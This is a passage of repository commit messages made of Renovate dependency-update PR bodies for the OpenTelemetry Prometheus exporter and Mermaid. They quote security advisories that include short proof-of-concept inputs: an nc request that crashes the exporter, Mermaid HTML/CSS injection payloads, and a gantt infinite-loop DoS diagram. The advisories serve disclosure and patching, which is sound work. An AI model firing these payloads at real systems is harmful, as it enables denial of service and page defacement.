([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.215.0` →
`^0.217.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.215.0/0.217.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-prometheus/0.217.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-prometheus/0.215.0/0.217.0?slim=true)
|

---

### Prometheus exporter process crash via malformed HTTP request
[CVE-2026-44902](https://nvd.nist.gov/vuln/detail/CVE-2026-44902) /
[GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)

<details>
<summary>More information</summary>

#### Details
##### Summary

A single malformed HTTP request crashes any Node.js process running the
OpenTelemetry JS Prometheus exporter. The metrics endpoint (default
`0.0.0.0:9464`) has no error handling around URL parsing, so a request
with an invalid URI causes an uncaught `TypeError` that terminates the
process.

**You are affected by this vulnerability if either of the following
apply to your application:**

* you directly use `@opentelemetry/exporter-prometheus` in your code
through its built-in server.
* your `OTEL_METRICS_EXPORTER` environment variable includes
`prometheus` **AND**
  * you use `@opentelemetry/sdk-node`
* you use `@opentelemetry/auto-instrumentations-node` via `--require
@&#8203;opentelemetry/auto-instrumentations-node/register`/`--import
@&#8203;opentelemetry/auto-instrumentations-node/register`

##### Impact

**Denial of service.** Any application using the OpenTelemetry
Prometheus exporter’s built-in server can be crashed by a single
unauthenticated network packet sent to the metrics port. No
authentication, special privileges, or prior access is required.

##### Remediation

##### Update to the fixed version

Update `@opentelemetry/exporter-prometheus` and
`@opentelemetry/sdk-node` to version **0.217.0** or later.
Update `@opentelemetry/auto-instrumentations-node` to version **0.75.0**
or later.

This release adds proper error handling around the URL constructor,
returning an HTTP `400` response on parse failure rather than allowing
the exception to propagate and crash the process.

```
npm install @&#8203;opentelemetry/exporter-prometheus@latest
```

##### Do Not Expose the Endpoint to Untrusted Users

> [!IMPORTANT] 
> The following mitigations reduce exposure but do not fully remediate
the vulnerability. Any client that *can* reach the metrics endpoint -
including your own Prometheus scraper host if compromised - could still
trigger the crash. Updating to **0.217.0** is the recommended
resolution.

If updating is not immediately feasible, restrict access to the metrics
endpoint so that it is not reachable by untrusted or unauthenticated
network clients. For example:

* **Bind to localhost only** by setting the `host` option to `127.0.0.1`
when configuring the `PrometheusExporter`, so the port is not exposed on
public or shared network interfaces

* **Use a firewall or network policy** to restrict access to port `9464`
(or whichever port you have configured) to only trusted Prometheus
scrape hosts

* **Place the endpoint behind a reverse proxy** that filters or
validates incoming requests before they reach the exporter

##### Details

In `PrometheusExporter.ts`, the `_requestHandler` calls `new
URL(request.url, this._baseUrl)` without any error handling. Node's HTTP
parser accepts absolute-form URIs (e.g. `http://`) for proxy
compatibility, including malformed ones. When `request.url` is
`"http://"`, the `URL` constructor throws `TypeError: Invalid URL`.
Since there is no try-catch in the handler, the exception propagates as
an uncaught exception and crashes the process.

The Prometheus metrics endpoint is unauthenticated by design (Prometheus
scrapes it) and binds to `0.0.0.0` by default, meaning it is reachable
by any network client that can connect to the metrics port.

##### Proof of Concept

Start any Node.js application with the Prometheus exporter running on
the default port `9464`, then send a single raw TCP packet:

```
echo -ne 'GET http:// HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc localhost 9464
```

The process crashes immediately with:

```
TypeError: Invalid URL
    at new URL (...)
    at PrometheusExporter._requestHandler (...)
```

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

#### References
-
[https://github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3)
-
[https://github.com/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js
(@&#8203;opentelemetry/exporter-prometheus)</summary>

###
[`v0.217.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c)

###
[`v0.216.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-12 16:21:10 +08:00
renovate[bot] 6b720206c6 chore: bump up mermaid version to v11.15.0 [SECURITY] (#14946)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [mermaid](https://redirect.github.com/mermaid-js/mermaid) | [`11.13.0`
→ `11.15.0`](https://renovatebot.com/diffs/npm/mermaid/11.13.0/11.15.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/mermaid/11.15.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/mermaid/11.13.0/11.15.0?slim=true)
|

---

### Mermaid: Improper sanitization of `classDef` in state diagrams leads
to HTML injection
[CVE-2026-41149](https://nvd.nist.gov/vuln/detail/CVE-2026-41149) /
[GHSA-ghcm-xqfw-q4vr](https://redirect.github.com/advisories/GHSA-ghcm-xqfw-q4vr)

<details>
<summary>More information</summary>

#### Details
##### Impact

Under the default configuration, Mermaid state diagram's `classDef`
allow DOM injection that escapes the SVG, although `<script>` tags are
removed, preventing XSS.

##### Proof-of-concept

```
stateDiagram-v2
  classDef xss fill:red</style></svg><style>*{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}</style><div style="x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black">HACKED</div><svg><style>a:b
  [*] --> A:::xss
```

##### Patches

-
[v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
(see
[37ff937f1da2e19f882fd1db01235db4d01f4056](https://redirect.github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056))
-
[v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
(see
[4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://redirect.github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3))

##### Workarounds

If you can not update to a patched version, setting [`"securityLevel":
"sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
will prevent this, by rendering the mermaid diagram in a sandboxed
`<iframe>`.

##### Credits

Thanks to @&#8203;zsxsoft from @&#8203;KeenSecurityLab for reporting
this vulnerability.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L`

#### References
-
[https://github.com/mermaid-js/mermaid/security/advisories/GHSA-ghcm-xqfw-q4vr](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-ghcm-xqfw-q4vr)
-
[https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056](https://redirect.github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056)
-
[https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://redirect.github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3)
-
[https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
-
[https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
-
[https://mermaid.js.org/config/schema-docs/config.html#securitylevel](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
-
[https://github.com/advisories/GHSA-ghcm-xqfw-q4vr](https://redirect.github.com/advisories/GHSA-ghcm-xqfw-q4vr)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-ghcm-xqfw-q4vr)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Mermaid: Improper sanitization of `classDefs` in diagrams leads to
CSS injection
[CVE-2026-41148](https://nvd.nist.gov/vuln/detail/CVE-2026-41148) /
[GHSA-xcj9-5m2h-648r](https://redirect.github.com/advisories/GHSA-xcj9-5m2h-648r)

<details>
<summary>More information</summary>

#### Details
##### Details

The state diagram and any other diagram type that routes user-controlled
style strings through createCssStyles parser for Mermaid v11.14.0 and
earlier captures `classDef` values with an unrestricted regex:

```jison
// packages/mermaid/src/diagrams/state/parser/stateDiagram.jison:83
<CLASSDEFID>[^\n]*   { this.popState(); return 'CLASSDEF_STYLEOPTS' }
```

The value passes unsanitized through `addStyleClass()` ->
`createCssStyles()` -> `style.innerHTML` (mermaidAPI.ts:418). A `}` in
the value closes the generated CSS selector, and everything after
becomes a new CSS rule on the page.

##### PoC

```
stateDiagram-v2 
      classDef x }*{ background-image: url("http://media.giphy.com/media/SggILpMXO7Xt6/giphy.gif")}
```

Live demo:

<https://mermaid.live/edit#pako:eNpFjzFvgzAQhf-KdVNbEcBgMHhtlkqtOnSJKi8ONsYKBmRMlRTx3-skanvTfbp7996t0IxSAYPZC6_2Rmgn7O4rQ00v5nmvWnRG29OKjqI5aTcug9wZK7RiaHH9A4fO-4kliVXSiFibqbvEzWjvnHxo_fI6vR3e6cGXyX2qTcvhcYMItDMSmHeLisAqZ8UVYeUDQhx8p6ziwEIrhTtx4MNVM4nhcxztrywE0h2wVvRzoGWS_z_8rahBKvcckntgmN5OAFvhDIzUNCZZQXCR5nVaZkUEF2BVFpOcEkoxxhUuyRbB980yjStapKHqoKFlhvPtB7BFZEU>

##### Patches

This has been patched in:

-
[v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
(see
[e9b0f34d8d82a6260077764ee45e1d7d90957a0f](https://redirect.github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f))
-
[v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
(see
[8fead23c59166b7bab6a39eac81acebee2859102](https://redirect.github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102))

##### Workarounds

Setting [`"securityLevel":
"sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
will prevent this, by rendering the mermaid diagram in a sandboxed
`<iframe>`.

##### Impact

Enables page defacement, user tracking via `url()` callbacks, and DOM
attribute exfiltration via CSS `:has()` selectors.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L`

#### References
-
[https://github.com/mermaid-js/mermaid/security/advisories/GHSA-xcj9-5m2h-648r](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-xcj9-5m2h-648r)
-
[https://github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102](https://redirect.github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102)
-
[https://github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f](https://redirect.github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f)
-
[https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
-
[https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
-
[https://mermaid.js.org/config/schema-docs/config.html#securitylevel](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
-
[https://github.com/advisories/GHSA-xcj9-5m2h-648r](https://redirect.github.com/advisories/GHSA-xcj9-5m2h-648r)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-xcj9-5m2h-648r)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Mermaid: Improper sanitization of configuration leads to CSS
injection
[CVE-2026-41159](https://nvd.nist.gov/vuln/detail/CVE-2026-41159) /
[GHSA-87f9-hvmw-gh4p](https://redirect.github.com/advisories/GHSA-87f9-hvmw-gh4p)

<details>
<summary>More information</summary>

#### Details
##### Impact

Mermaid's default configuration allows injecting CSS that applies
outside of the Mermaid diagram via the `fontFamily`, `themeCSS`, and
`altFontFamily` configuration options.

Live demo:
[mermaid.live](https://mermaid.live/edit#pako:eNpNjktLxDAUhf9KvFBR6JS-60QQfODKlUvJ5k6TtsEmKTHFGUP-u-mI6Nmdy3fOPR56wwVQSBIvtXSUeAaD0e4ZlZxPDChhcLxFfwiEauOuLq_9Afv30ZpVczpaITS5kGox1qF2gfSeBwYhJAnThAyz-ewntI68vG5-0z3Z7e7IA9OQwmglB-rsKlJQwircLPgNZeAmocTPAi4GXGfHgOkQYwvqN2PUbzJuGSegA84f0a0LRyeeJI4W_xChubCPcbQD2pwbgHo4Aq2aKmvbqq3zoiu7pizqFE6RybN9VFfFY1HWXRVS-Dr_zLObrt7_V_gGGXZlGg)

Example code:

```
%%{init: {"fontFamily": "x;a{b} :not(&){background:green !important} c{d}"}}%%
flowchart LR
    A --> B
```

The injected CSS exploits stylis's `&` (scope reference) handling.
`:not(&)` escapes the `#mermaid-xxx` automatic scoping, applying styles
to all page elements. Global at-rules (`@font-face`, `@keyframes`,
`@counter-style`) are also injectable as stylis hoists them to top
level.

This allows page defacement and DOM attribute exfiltration via CSS
`:has()` selectors.

##### Patches

-
[v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
(see
[64769738d5b59211e1decb471ffbaca8afec51aa](https://redirect.github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa))
-
[v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
(see
[a9d9f0d8eb790349121508688cd338253fd80d76](https://redirect.github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76))

##### Workarounds

If you can't upgrade mermaid, you can set the
[`secure`](https://mermaid.js.org/config/schema-docs/config.html#secure)
config value in the mermaid config to avoid allowing diagrams to modify
`fontFamily`, `themeCSS`, `altFontFamily`, and `themeVariables`.

Setting [`"securityLevel":
"sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
will also prevent this.

##### Credits

Reported by @&#8203;zsxsoft on behalf of @&#8203;KeenSecurityLab

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L`

#### References
-
[https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p)
-
[https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa](https://redirect.github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa)
-
[https://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76](https://redirect.github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76)
-
[https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
-
[https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
-
[https://github.com/advisories/GHSA-87f9-hvmw-gh4p](https://redirect.github.com/advisories/GHSA-87f9-hvmw-gh4p)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-87f9-hvmw-gh4p)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Mermaid Gantt Charts are vulnerable to an Infinite Loop DoS
[CVE-2026-41150](https://nvd.nist.gov/vuln/detail/CVE-2026-41150) /
[GHSA-6m6c-36f7-fhxh](https://redirect.github.com/advisories/GHSA-6m6c-36f7-fhxh)

<details>
<summary>More information</summary>

#### Details
##### Impact

Mermaid v11.14.0 and earlier are vulnerable to a denial-of-service
attack when rendering gantt charts, if they use the [`excludes`
attribute](https://mermaid.js.org/syntax/gantt.html?#excludes) to
exclude all dates.

Example:

```
gantt
  excludes monday,tuesday,wednesday,thursday,friday,saturday,sunday
  DoS :2025-01-01, 1d
```

`mermaid.parse` is unaffected, unless you then call the
`ganttDb.getTasks()` (which is called when rendering a diagram).

##### Patches

This has been patched in:

-
[v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
(see
[faafb5d49106dd32c367f3882505f2dd625aa30e](https://redirect.github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e))
-
[v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
(see
[a59ea56174712ee5430dfd5bc877cb5151f501a6](https://redirect.github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6))

##### Workarounds

There are no workarounds available without updating to a newer version
of mermaid.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L`

#### References
-
[https://github.com/mermaid-js/mermaid/security/advisories/GHSA-6m6c-36f7-fhxh](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-6m6c-36f7-fhxh)
-
[https://github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6](https://redirect.github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6)
-
[https://github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e](https://redirect.github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e)
-
[https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
-
[https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
-
[https://github.com/advisories/GHSA-6m6c-36f7-fhxh](https://redirect.github.com/advisories/GHSA-6m6c-36f7-fhxh)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-6m6c-36f7-fhxh)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>mermaid-js/mermaid (mermaid)</summary>

###
[`v11.15.0`](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)

[Compare
Source](https://redirect.github.com/mermaid-js/mermaid/compare/mermaid@11.14.0...mermaid@11.15.0)

##### Minor Changes

-
[#&#8203;7174](https://redirect.github.com/mermaid-js/mermaid/pull/7174)
[`0aca217`](https://redirect.github.com/mermaid-js/mermaid/commit/0aca21739c0d1fcaaa206e04a6cd574ebc415483)
Thanks
[@&#8203;milesspencer35](https://redirect.github.com/milesspencer35)! -
feat(sequence): Add support for decimal start and increment values in
the `autonumber` directive

-
[#&#8203;7512](https://redirect.github.com/mermaid-js/mermaid/pull/7512)
[`8e17492`](https://redirect.github.com/mermaid-js/mermaid/commit/8e17492f7365ba50896382feb69a23efd9d8a22d)
Thanks [@&#8203;aruncveli](https://redirect.github.com/aruncveli)! -
feat(flowchart): add datastore shape

In Data flow diagrams, a datastore/warehouse/file/database is used to
represent data persistence. It is denoted by a rectangle with only top
and bottom borders, and can be used in flowcharts with `A@{ shape:
datastore, label: "Datastore" }`.

-
[#&#8203;6440](https://redirect.github.com/mermaid-js/mermaid/pull/6440)
[`9ad8dde`](https://redirect.github.com/mermaid-js/mermaid/commit/9ad8dde6d049adde85d8ed2d476c09b5820f3f4b)
Thanks [@&#8203;yordis](https://redirect.github.com/yordis),
[@&#8203;lgazo](https://redirect.github.com/lgazo)! - feat: add Event
Modeling diagram

-
[#&#8203;7707](https://redirect.github.com/mermaid-js/mermaid/pull/7707)
[`27db774`](https://redirect.github.com/mermaid-js/mermaid/commit/27db774627be1cee881961dfd0d2cb21cd01b79d)
Thanks [@&#8203;txmxthy](https://redirect.github.com/txmxthy)! -
feat(architecture): expose four fcose layout knobs for
`architecture-beta` diagrams (`nodeSeparation`,
`idealEdgeLengthMultiplier`, `edgeElasticity`, `numIter`) so authors can
tune layout density and spread overlapping siblings without changing
diagram source

-
[#&#8203;7604](https://redirect.github.com/mermaid-js/mermaid/pull/7604)
[`bf9502f`](https://redirect.github.com/mermaid-js/mermaid/commit/bf9502fb6012a4b724679b401ac928f5ee55161c)
Thanks [@&#8203;M-a-c](https://redirect.github.com/M-a-c)! -
feat(class): add nested namespace support for class diagrams via dot
notation and syntactic nesting

If you have namespaces in class diagrams that use `.`s already and want
to render them without nesting (≤v11.14.0 behaviour), you can use set
`class.hierarchicalNamespaces=false` in your mermaid config:

  ```yaml
  config:
    class:
      hierarchicalNamespaces: false
  ```

-
[#&#8203;7272](https://redirect.github.com/mermaid-js/mermaid/pull/7272)
[`88cdd3d`](https://redirect.github.com/mermaid-js/mermaid/commit/88cdd3dc0aab9577174561b04e14760c565a232b)
Thanks [@&#8203;xinbenlv](https://redirect.github.com/xinbenlv)! -
feat(sankey): add outlined label style, configurable
nodeWidth/nodePadding, and custom node colors

##### Patch Changes

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`e9b0f34`](https://redirect.github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: prevent unbalanced CSS styles in classDefs

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`37ff937`](https://redirect.github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: create CSS styles using the CSSOM

  This removes some invalid CSS and normalizes some CSS formatting.

-
[#&#8203;7508](https://redirect.github.com/mermaid-js/mermaid/pull/7508)
[`bfe60cc`](https://redirect.github.com/mermaid-js/mermaid/commit/bfe60cc67b9a6dec64f9161f58e4d24a06c42b65)
Thanks [@&#8203;biiab](https://redirect.github.com/biiab)! -
fix(stateDiagram): `end note` now only closes a note when used on a new
line

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`faafb5d`](https://redirect.github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix(gantt): add iteration limit for `excludes` field

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`65f8be2`](https://redirect.github.com/mermaid-js/mermaid/commit/65f8be2a42faf869b811469571983cba7eeeca99)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: disallow some CSS at-rules in custom CSS

-
[#&#8203;7726](https://redirect.github.com/mermaid-js/mermaid/pull/7726)
[`1502f32`](https://redirect.github.com/mermaid-js/mermaid/commit/1502f32f3c5fb944925b0c527fbbde3c4f041824)
Thanks [@&#8203;aloisklink](https://redirect.github.com/aloisklink)! -
fix(wardley): fix unnecessary sanitization of text

-
[#&#8203;7578](https://redirect.github.com/mermaid-js/mermaid/pull/7578)
[`1f98db8`](https://redirect.github.com/mermaid-js/mermaid/commit/1f98db8e326299ac97a2fa60abfd509d8f5f16e2)
Thanks [@&#8203;Gaston202](https://redirect.github.com/Gaston202)! -
fix(class): self-referential class multiplicity labels no longer
rendered multiple times

Fixes
[#&#8203;7560](https://redirect.github.com/mermaid-js/mermaid/issues/7560).
Resolves an issue where cardinality labels on self-referential class
relationships were rendered three times due to edge splitting in the
dagre layout. The fix ensures that each sub-edge only carries its
relevant label positions.

-
[#&#8203;7592](https://redirect.github.com/mermaid-js/mermaid/pull/7592)
[`2343e38`](https://redirect.github.com/mermaid-js/mermaid/commit/2343e38498a3b31f8ce5e79f1f009e0b56fbe086)
Thanks [@&#8203;knsv-bot](https://redirect.github.com/knsv-bot)! -
fix(sequence): add background box behind alt/else section title labels
in sequence diagrams

-
[#&#8203;7589](https://redirect.github.com/mermaid-js/mermaid/pull/7589)
[`7fb9509`](https://redirect.github.com/mermaid-js/mermaid/commit/7fb9509b8b5cb1dc48519dc60cf6cdc6afba0462)
Thanks [@&#8203;NYCU-Chung](https://redirect.github.com/NYCU-Chung)! -
fix(block): prevent column widths from shrinking when mixing different
column spans

-
[#&#8203;7632](https://redirect.github.com/mermaid-js/mermaid/pull/7632)
[`3f9e0f1`](https://redirect.github.com/mermaid-js/mermaid/commit/3f9e0f15bedc1e2c71ddb6b34192d1a21124cfc2)
Thanks [@&#8203;ekiauhce](https://redirect.github.com/ekiauhce)! -
fix(sequence): correct messageAlign label position for right-to-left
arrows in sequence diagrams

-
[#&#8203;7642](https://redirect.github.com/mermaid-js/mermaid/pull/7642)
[`7a8fb85`](https://redirect.github.com/mermaid-js/mermaid/commit/7a8fb8532c57ecc55b3711454ab0e505a4291445)
Thanks [@&#8203;tractorjuice](https://redirect.github.com/tractorjuice)!
- fix(wardley): allow hyphens in unquoted component names

Multi-word names containing hyphens — e.g. `real-time processing`,
`end-user`, `on-call engineer` — now parse without quoting, bringing the
grammar in line with the OnlineWardleyMaps (OWM) convention. `A->B`
(no-space arrow) still tokenises correctly.

-
[#&#8203;7523](https://redirect.github.com/mermaid-js/mermaid/pull/7523)
[`5144ed4`](https://redirect.github.com/mermaid-js/mermaid/commit/5144ed4b138ae0f4836bab4c163c575e0a767dd3)
Thanks [@&#8203;darshanr0107](https://redirect.github.com/darshanr0107)!
- fix(block): Arrow blocks in block-beta diagrams not spanning the
specified number of columns when using `:n` syntax.

-
[#&#8203;7262](https://redirect.github.com/mermaid-js/mermaid/pull/7262)
[`13d9bfa`](https://redirect.github.com/mermaid-js/mermaid/commit/13d9bfa4748e845a9eec7d6265ba496d2278f26e)
Thanks [@&#8203;darshanr0107](https://redirect.github.com/darshanr0107)!
- fix(block): Ensure block diagram hexagon blocks respect column
spanning syntax

-
[#&#8203;7684](https://redirect.github.com/mermaid-js/mermaid/pull/7684)
[`e14bb88`](https://redirect.github.com/mermaid-js/mermaid/commit/e14bb88bdb940124cdb0a107025653bf93745c99)
Thanks [@&#8203;aloisklink](https://redirect.github.com/aloisklink)! -
fix: loosen `uuid` dependency range to allow v14

  Mermaid does not use any of the vulnerable code in CVE-2026-41907,
  but this allows users to silence any `npm audit` alerts on it.

-
[#&#8203;7633](https://redirect.github.com/mermaid-js/mermaid/pull/7633)
[`9217c0d`](https://redirect.github.com/mermaid-js/mermaid/commit/9217c0d8b221b423af80e420b7adae901acf6c8c)
Thanks [@&#8203;Felix-Garci](https://redirect.github.com/Felix-Garci)! -
fix(block): add support for all arrow types in block diagrams

-
[#&#8203;7587](https://redirect.github.com/mermaid-js/mermaid/pull/7587)
[`5e7eb62`](https://redirect.github.com/mermaid-js/mermaid/commit/5e7eb62e3aba6b5df559f5c839a868e5b7f40e72)
Thanks
[@&#8203;MaddyGuthridge](https://redirect.github.com/MaddyGuthridge)! -
chore: drop lodash-es in favour of es-toolkit

-
[#&#8203;7693](https://redirect.github.com/mermaid-js/mermaid/pull/7693)
[`afaf306`](https://redirect.github.com/mermaid-js/mermaid/commit/afaf3062381d115d66744413151b642f124dd9ba)
